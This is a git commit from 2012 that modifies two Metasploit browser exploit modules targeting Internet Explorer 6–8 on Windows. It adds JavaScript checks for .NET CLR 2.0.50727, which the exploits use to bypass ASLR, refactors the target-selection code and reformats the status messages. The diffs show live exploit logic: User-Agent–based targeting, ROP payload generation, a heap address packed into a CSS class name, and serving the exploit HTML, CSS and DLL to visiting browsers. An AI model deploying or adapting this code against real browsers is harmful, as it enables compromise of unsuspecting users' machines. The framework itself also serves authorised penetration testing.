Add checks for .NET requisites

Also standardizes print_status format to look nicer with lots of cilents
unstable
James Lee 2012-04-09 01:23:44 -06:00
parent a6b106e867
commit 3ca440089e
2 changed files with 29 additions and 19 deletions

View File

@ -22,7 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
# Not strictly a vuln check, but an exploitability check since a
# specific version of .NET is required to make the ROP work.
:vuln_test => "if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true }else{ is_vuln = false }",
})
def initialize(info = {})
@ -152,27 +154,30 @@ class Metasploit3 < Msf::Exploit::Remote
agent = request.headers['User-Agent']
#print_status("Checking user agent: #{agent}")
if agent !~ /\.NET CLR 2\.0\.50727/
print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727")
return nil
end
if agent =~ /MSIE 6\.0/
mytarget = targets[3]
elsif agent =~ /MSIE 7\.0/
mytarget = targets[2]
mytarget = ua_has_clr(cli,agent) ? targets[2] : nil
elsif agent =~ /MSIE 8\.0/
mytarget = targets[1]
mytarget = ua_has_clr(cli,agent) ? targets[1] : nil
else
print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}")
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
end
mytarget
end
def ua_has_clr(cli, agent)
if agent =~ /\.NET CLR 2\.0\.50727/
return true
end
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target machine does not have the .NET CLR 2.0.50727")
false
end
def on_request_uri(cli, request)
print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect)
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Received request for %s" % request.uri.inspect)
mytarget = target
if target.name == 'Automatic'
@ -183,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
#print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}")
#print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Automatically selected target: #{mytarget.name}")
buf_addr = mytarget.ret
css_name = [buf_addr].pack('V') * (16 / 4)
@ -193,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
uni_placeholder = Rex::Text.to_unicode(placeholder)
if request.uri == get_resource() or request.uri =~ /\/$/
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect")
redir = get_resource()
redir << '/' if redir[-1,1] != '/'
@ -205,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
# Generate the ROP payload
rvas = rvas_mscorie_v2()
@ -309,7 +314,7 @@ EOS
send_response(cli, html, { 'Content-Type' => 'text/html' })
elsif request.uri =~ /\.dll$/
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending .NET DLL")
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
# use it's contents ...
@ -340,7 +345,7 @@ EOS
css = "\xff\xfe" + Rex::Text.to_unicode(css)
css.gsub!(uni_placeholder, css_name)
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending CSS")
send_response(cli, css, { 'Content-Type' => 'text/css' })

View File

@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil,
# If it's IE 8, then we need .net to bypass ASLR
:vuln_test => %Q|
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
}
|,
})
def initialize(info={})
@ -153,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
mytarget = auto_target(cli, request)
if mytarget.nil?
agent = request.headers['User-Agent']
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
send_not_found(cli)
return
end
@ -175,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
DATA
print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...")
send_response(cli, data, { 'Content-Type' => 'text/html' })
return
end
@ -297,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
HTML
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...")
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end